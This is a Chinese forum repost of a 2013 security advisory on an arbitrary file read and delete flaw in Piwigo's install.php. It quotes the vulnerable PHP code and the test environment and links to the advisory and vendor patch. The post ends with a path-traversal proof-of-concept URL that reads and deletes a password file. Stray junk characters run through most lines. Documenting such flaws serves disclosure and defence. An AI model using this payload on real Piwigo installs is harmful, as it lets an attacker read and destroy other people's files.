找回密码
 立即注册
查看: 2542|回复: 0
打印 上一主题 下一主题

Piwigo任意文件泄露和任意文件删除漏洞

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-14 20:15:53 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
Piwigo是用PHP编写的相册脚本。
- M- x; H9 M  _8 G& i: y) ]" z! |0 R3 f/ Z. |: X: g$ X
Piwigo 2.4.6及其他版本没有正确验证install.php脚本的 'dl'参数值,在实现上存在安全漏洞,攻击者可利用这些漏洞查看受影响计算机上的任意文件,删除受影响应用上下文内的任意文件。
. {- c  c2 P$ x1 @$ k. ~, O6 X====================================================================/ z; p; W, H: i3 e1 _& p
/install.php:
; U5 |5 E( o- o. i! r. P8 G+ N-------------/ n- [. I* A$ q6 g+ E$ _1 B* X4 R
113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'])). f6 h+ w& U1 G# F+ S: H+ X; m( M
114: {
0 Q/ W3 E1 g2 Z! ?+ J! H115:   $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];( `* I+ `% {0 s( Y7 j
116:   header('Cache-Control: no-cache, must-revalidate');$ B4 s" Y/ ~2 J# q2 ]
117:   header('Pragma: no-cache');
/ O$ F8 @/ i, F' [! V/ [) f118:   header('Content-Disposition: attachment; filename="database.inc.php"');
, R7 \/ i: i/ i* M8 X- G, Z119:   header('Content-Transfer-Encoding: binary');6 ?8 s5 m) E% |4 {
120:   header('Content-Length: '.filesize($filename));5 M9 ^4 Z2 H& A1 ?, W2 n6 _
121:   echo file_get_contents($filename);
% H+ X" ?: B- {' b9 p122:   unlink($filename);3 m3 L$ K( \7 T6 i7 R
123:   exit();" y- c! Y5 {% S& h  o6 |
124: }
4 E+ ^3 s+ W* w! g3 L; d% ^( P5 \====================================================================
) W0 C9 ~; ^* x4 a) C0 S  U
  l( A6 W9 \2 f+ T; o! eTested on: Microsoft Windows 7 Ultimate SP1 (EN)! i; p# _( K1 v5 ?4 d( Z7 x5 v6 G
           Apache 2.4.2 (Win32), V9 m' g7 g5 F# \
           PHP 5.4.49 j; e# ^2 @& ~) W$ M5 s
           MySQL 5.5.25a; C5 m$ ~3 [0 c) K
' k0 X* U7 k- w5 q! ~; \+ R
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic) B- p3 u% M% D1 Q; u
                            @zeroscience4 K& F: Q3 j. d) D0 Z* V3 j6 f3 `

7 o+ K! p& j' I7 `3 WAdvisory ID: ZSL-2013-5127% e3 x! [8 i; {6 k; d% Q
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php
. r- P, J4 c# v1 Z6 j& `Vendor Patch: http://piwigo.org/bugs/view.php?id=2843
- @4 r* E8 y' P1 |. B+ z  [6 y' {
+ {, U4 Q0 F" n/ }15.02.2013
) z+ t! T' g6 G
+ c: |& U7 A6 e4 u2 T8 M1 @6 Q% m: W--
/ b& k8 J: g* ?) Z6 @" Phttp://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt
: h0 Y6 f" r) c
) o& c2 O* A- Z
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表